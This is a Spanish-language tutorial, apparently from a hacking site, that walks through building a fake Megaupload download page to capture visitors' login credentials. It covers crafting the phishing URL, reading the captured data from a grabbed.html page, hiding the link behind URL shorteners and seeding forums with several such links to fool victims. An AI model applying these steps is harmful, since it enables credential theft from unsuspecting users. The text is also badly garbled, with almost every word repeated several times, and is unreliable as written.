premiumpremiumpremium
premium
piquepiquepique
pique
lalala
la
descargadescargadescarga
descarga
debedebedebe
debe
dedede
de
serserser
ser
dedede
de
bastantesbastantesbastantes
bastantes
linkslinkslinks
links
sisisi
si
solosolosolo
solo
ponenponenponen
ponen
unounouno
uno
nadienadienadie
nadie
picarapicarapicara
picara
esoesoeso
eso
estaestaesta
esta
claro.Porclaro.Porclaro.Por
claro.Por
ejemploejemploejemplo
ejemplo
voyvoyvoy
voy
aaa
a
modificarmodificarmodificar
modificar
eseeseese
ese
mismomismomismo
mismo
linklinklink
link
otraotraotra
otra
vezvezvez
vez
paraparapara
para
quequeque
que
puedanpuedanpuedan
puedan
ververver
ver
comocomocomo
como
sesese
se
hace,primerohace,primerohace,primero
hace,primero
buscamosbuscamosbuscamos
buscamos
unaunauna
una
descargadescargadescarga
descarga
comocomocomo
como
yayaya
ya
hehehe
he
dichodichodicho
dicho
yoyoyo
yo
usareusareusare
usare
estaestaesta
esta
NoNoNo
No
hacehacehace
hace
faltafaltafalta
falta
quequeque
que
copiencopiencopien
copien
todostodostodos
todos
losloslos
los
linkslinkslinks
links
sinosinosino
sino
quierenquierenquieren
quieren
solosolosolo
solo
eseses
es
paraparapara
para
sacarlesacarlesacarle
sacarle
losloslos
los
datosdatosdatos
datos
yyy
y
quequeque
que
parezcaparezcaparezca
parezca
real...real...real...
real...
CogeremosCogeremosCogeremos
Cogeremos
elelel
el
primerprimerprimer
primer
linklinklink
link
dedede
de
megauploadmegauploadmegaupload
megaupload
yyy
y
lololo
lo
ponemosponemosponemos
ponemos
enenen
en
elelel
el
navegadornavegadornavegador
navegador
EstosEstosEstos
Estos
sonsonson
son
losloslos
los
datosdatosdatos
datos
realesrealesreales
reales
ahoraahoraahora
ahora
vamosvamosvamos
vamos
aaa
a
crearcrearcrear
crear
elelel
el
linklinklink
link
fakefakefake
fake
conconcon
con
estosestosestos
estos
mismosmismosmismos
mismos
datosdatosdatos
datos
peroperopero
pero
lalala
la
urlurlurl
url
dedede
de
nuestronuestronuestro
nuestro
hosting,comohosting,comohosting,como
hosting,como
puedenpuedenpueden
pueden
ververver
ver
estanestanestan
estan
laslaslas
las
trestrestres
tres
lineaslineaslineas
lineas
numeradasnumeradasnumeradas
numeradas
1,2,3,copiamos1,2,3,copiamos1,2,3,copiamos
1,2,3,copiamos
elelel
el
linklinklink
link
alalal
al
blocblocbloc
bloc
dedede
de
notasnotasnotas
notas
http://www.level-23.com/testhttp://www.level-23.com/testhttp://www.level-23.com/test
http://www.level-23.com/test
/?file_name=/?file_name=/?file_name=
/?file_name=
TBB1988.x264.m-hd-TBB1988.x264.m-hd-TBB1988.x264.m-hd-
TBB1988.x264.m-hd-
tom.720p.part0..rartom.720p.part0..rartom.720p.part0..rar
tom.720p.part0..rar
&file_description=&file_description=&file_description=
&file_description=
www.mhd-hdhieu.comwww.mhd-hdhieu.comwww.mhd-hdhieu.com
www.mhd-hdhieu.com
&file_size=&file_size=&file_size=
&file_size=
95.7895.7895.78
95.78
MBMBMB
MB
%20MB&downloadID=UU4MWIIU%20MB&downloadID=UU4MWIIU%20MB&downloadID=UU4MWIIU
%20MB&downloadID=UU4MWIIU
ElElEl
El
colorcolorcolor
color
verdeverdeverde
verde
seraserasera
sera
lalala
la
rutarutaruta
ruta
dedede
de
nuestronuestronuestro
nuestro
hostinghostinghosting
hosting
ElElEl
El
colorcolorcolor
color
rojorojorojo
rojo
seraserasera
sera
elelel
el
nombrenombrenombre
nombre
quequeque
que
copiaremoscopiaremoscopiaremos
copiaremos
dedede
de
lalala
la
descargadescargadescarga
descarga
realrealreal
real
ElElEl
El
colorcolorcolor
color
rosarosarosa
rosa
seraserasera
sera
lalala
la
descripciondescripciondescripcion
descripcion
deldeldel
del
archivoarchivoarchivo
archivo
ElElEl
El
azulazulazul
azul
seraserasera
sera
elelel
el
tamanotamanotamano
tamano
dedede
de
lalala
la
descargadescargadescarga
descarga
YaYaYa
Ya
tenemostenemostenemos
tenemos
elelel
el
linklinklink
link
deldeldel
del
phiserphiserphiser
phiser
creadocreadocreado
creado
ahoraahoraahora
ahora
vamosvamosvamos
vamos
aaa
a
probarloprobarloprobarlo
probarlo
EsaEsaEsa
Esa
eseses
es
lalala
la
paginapaginapagina
pagina
fakefakefake
fake
quequeque
que
veraveravera
vera
laslaslas
las
victimas,voyvictimas,voyvictimas,voy
victimas,voy
aaa
a
probarprobarprobar
probar
aaa
a
ververver
ver
sisisi
si
capturacapturacaptura
captura
losloslos
los
datos,entrandatos,entrandatos,entran
datos,entran
enenen
en
elelel
el
LoginLoginLogin
Login
YYY
Y
ahoraahoraahora
ahora
paraparapara
para
pderpderpder
pder
ververver
ver
losloslos
los
datosdatosdatos
datos
capturadoscapturadoscapturados
capturados
solosolosolo
solo
ponemosponemosponemos
ponemos
estoestoesto
esto
enenen
en
elelel
el
navegadornavegadornavegador
navegador
http://www.level-23.com/testhttp://www.level-23.com/testhttp://www.level-23.com/test
http://www.level-23.com/test
/grabbed.html/grabbed.html/grabbed.html
/grabbed.html
LaLaLa
La
rojorojorojo
rojo
eseses
es
sususu
su
hostinghostinghosting
hosting
xDxDxD
xD
YaYaYa
Ya
tenemostenemostenemos
tenemos
losloslos
los
datosdatosdatos
datos
deldeldel
del
primerprimerprimer
primer
inocenteinocenteinocente
inocente
xD...ahoraxD...ahoraxD...ahora
xD...ahora
paraparapara
para
camuflarcamuflarcamuflar
camuflar
lalala
la
urlurlurl
url
nuestranuestranuestra
nuestra
yyy
y
quequeque
que
parezcaparezcaparezca
parezca
masmasmas
mas
realrealreal
real
yayaya
ya
quequeque
que
sisisi
si
venvenven
ven
ununun
un
urlurlurl
url
sospechosasospechosasospechosa
sospechosa
comocomocomo
como
lalala
la
miamiamia
mia
NadieNadieNadie
Nadie
descargaradescargaradescargara
descargara
yyy
y
borraranborraranborraran
borraran
elelel
el
postpostpost
post
enenen
en
222
2
minutos,paraminutos,paraminutos,para
minutos,para
camuflarcamuflarcamuflar
camuflar
lalala
la
urlurlurl
url
podemospodemospodemos
podemos
usarusarusar
usar
estaestaesta
esta
paginapaginapagina
pagina
http://urlteam.orghttp://urlteam.orghttp://urlteam.org
http://urlteam.org
O esta otra
http://lix.in/http://lix.in/http://lix.in/
http://lix.in/
TienenTienenTienen
Tienen
quequeque
que
ponerponerponer
poner
losloslos
los
linkslinkslinks
links
taltaltal
tal
cualcualcual
cual
estaestaesta
esta
elelel
el
fakefakefake
fake
LinkLinkLink
Link
fakefakefake
fake
http://www.level-23.com/test/?file_name=TBB1988.x264.m-hd-http://www.level-23.com/test/?file_name=TBB1988.x264.m-hd-http://www.level-23.com/test/?file_name=TBB1988.x264.m-hd-
http://www.level-23.com/test/?file_name=TBB1988.x264.m-hd-
tom.720p.part0..rartom.720p.part0..rartom.720p.part0..rar
tom.720p.part0..rar
&file_description=www.mhd-hdhieu.com&file_size=95.78&file_description=www.mhd-hdhieu.com&file_size=95.78&file_description=www.mhd-hdhieu.com&file_size=95.78
&file_description=www.mhd-hdhieu.com&file_size=95.78
MB%20MB&downloadID=UU4MWIIUMB%20MB&downloadID=UU4MWIIUMB%20MB&downloadID=UU4MWIIU
MB%20MB&downloadID=UU4MWIIU
LinkLinkLink
Link
FakeFakeFake
Fake
camufladocamufladocamuflado
camuflado
http://lix.in/-542849http://lix.in/-542849http://lix.in/-542849
http://lix.in/-542849
AhoraAhoraAhora
Ahora
vamosvamosvamos
vamos
aaa
a
entrarentrarentrar
entrar
enenen
en
eseeseese
ese
linklinklink
link
fakefakefake
fake
EstaEstaEsta
Esta
perfectoperfectoperfecto
perfecto
paraparapara
para
dejarlodejarlodejarlo
dejarlo
enenen
en
algunalgunalgun
algun
foro,tendranforo,tendranforo,tendran
foro,tendran
quequeque
que
hacerhacerhacer
hacer
esoesoeso
eso
mismomismomismo
mismo
conconcon
con
777
7
ooo
o
888
8
linkslinkslinks
links
paraparapara
para
quequeque
que
parezcaparezcaparezca
parezca
realrealreal
real
lalala
la
descargadescargadescarga
descarga
dedede
de
lalala
la
peliculapeliculapelicula
pelicula
ooo
o
juego,voyjuego,voyjuego,voy
juego,voy
aaa
a
probraloprobraloprobralo
probralo
aaa
a
ververver
ver
sisisi
si
aunaunaun
aun
capturacapturacaptura
captura
losloslos
los
datosdatosdatos
datos
conconcon
con
estaestaesta
esta
urlurlurl
url
camufladacamufladacamuflada
camuflada
VaVaVa
Va
perfectoperfectoperfecto
perfecto
eseses
es
asiasiasi
asi
dedede
de
sencillosencillosencillo
sencillo
yyy
y
rapido...rapido...rapido...
rapido...
AutorAutorAutor
Autor
:::
:
XtazisXtazisXtazis
Xtazis
GraciasGraciasGracias
Gracias
aaa
a
todostodostodos
todos
porporpor
por
participarparticiparparticipar
participar
ManualManualManual
Manual
EsteganografEsteganografEsteganograf
Esteganograf
ííí
í
aaa
a
(Shevchenko)(Shevchenko)(Shevchenko)
(Shevchenko)
ManualManualManual
Manual
xulxulxul
xul
(Shevchenko)(Shevchenko)(Shevchenko)
(Shevchenko)
IntrusionIntrusionIntrusion
Intrusion
aaa
a
ununun
un
RouterRouterRouter
Router
MedianteMedianteMediante
Mediante
TelnetTelnetTelnet
Telnet
(S(S(S
(S
toptoptop
top
)))
)
InstalarInstalarInstalar
Instalar
UbuntuStudioUbuntuStudioUbuntuStudio
UbuntuStudio
(UnknownShadow)(UnknownShadow)(UnknownShadow)
(UnknownShadow)
TelnetTelnetTelnet
Telnet
yyy
y
sshsshssh
ssh
(The(The(The
(The
JokeR)JokeR)JokeR)
JokeR)
XSSXSSXSS
XSS
TUNELINGTUNELINGTUNELING
TUNELING
(Max(Max(Max
(Max
p0werp0werp0wer
p0wer
”””
”
frozenfewfrozenfewfrozenfew
frozenfew
”””
”
)))
)
IntroducciIntroducciIntroducci
Introducci
óóó
ó
nnn
n
aaa
a
XSSXSSXSS
XSS
(Max(Max(Max
(Max
p0werp0werp0wer
p0wer
”””
”
frozenfewfrozenfewfrozenfew
frozenfew
”””
”
)))
)
CursoCursoCurso
Curso
BBB
B
ááá
á
sicosicosico
sico
dedede
de
ProgramaciProgramaciProgramaci
Programaci
óóó
ó
nnn
n
enenen
en
HTMLHTMLHTML
HTML
yyy
y
CSSCSSCSS
CSS
(Ghost)(Ghost)(Ghost)
(Ghost)
ManualManualManual
Manual
InyeccionInyeccionInyeccion
Inyeccion
SqlSqlSql
Sql
(eDeex_)(eDeex_)(eDeex_)
(eDeex_)
ArquitecturaArquitecturaArquitectura
Arquitectura
dedede
de
ComputadoresComputadoresComputadores
Computadores
(Habor)(Habor)(Habor)
(Habor)
ManualManualManual
Manual
PhiserPhiserPhiser
Phiser
RapidshareRapidshareRapidshare
Rapidshare
200920092009
2009
(((
(
xtazisxtazisxtazis
xtazis
)))
)
ManualManualManual
Manual
PhiserPhiserPhiser
Phiser
MegauploadMegauploadMegaupload
Megaupload
200920092009
2009
(((
(
xtazisxtazisxtazis
xtazis
)))
)
www.level-23.comwww.level-23.comwww.level-23.com
www.level-23.com
HackHackHack
Hack
ToolsToolsTools
Tools